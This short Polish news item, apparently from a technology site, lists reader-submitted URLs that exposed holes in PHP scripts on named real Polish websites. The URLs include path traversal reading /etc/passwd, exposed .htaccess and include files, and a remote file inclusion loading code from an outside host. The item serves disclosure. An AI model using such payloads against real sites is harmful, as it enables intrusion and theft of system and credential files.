Dziury w skryptach PHP
Wielu z naszych czytelników, po opublikowaniu artykułu „Izba marnie zabezpieczona” – podesłało nam kilkanaście linków dających dość oryginalne wyniki, wśród nich m.in.:
http://imiennik.com.pl/index.php?plik=../../../etc/passwd
http://www.tester.com3.pl/index.php?plik=../../../../../etc/passwd
http://www.wirtualnypoznan.pl/inc
http://www.krakow.pl/.htaccess_o
http://www.krakow.pl/samorzad/fotoreportaz/?id=http://republika.pl/h0meless/a/test
W chwili publikowania powyższych adresów wszystkie z nich pokazywały faktycznie te informacje na które wskazywał ich URL.
Zobacz również:
passwd Portalu Księgarskiego
Izba marnie zabezpieczona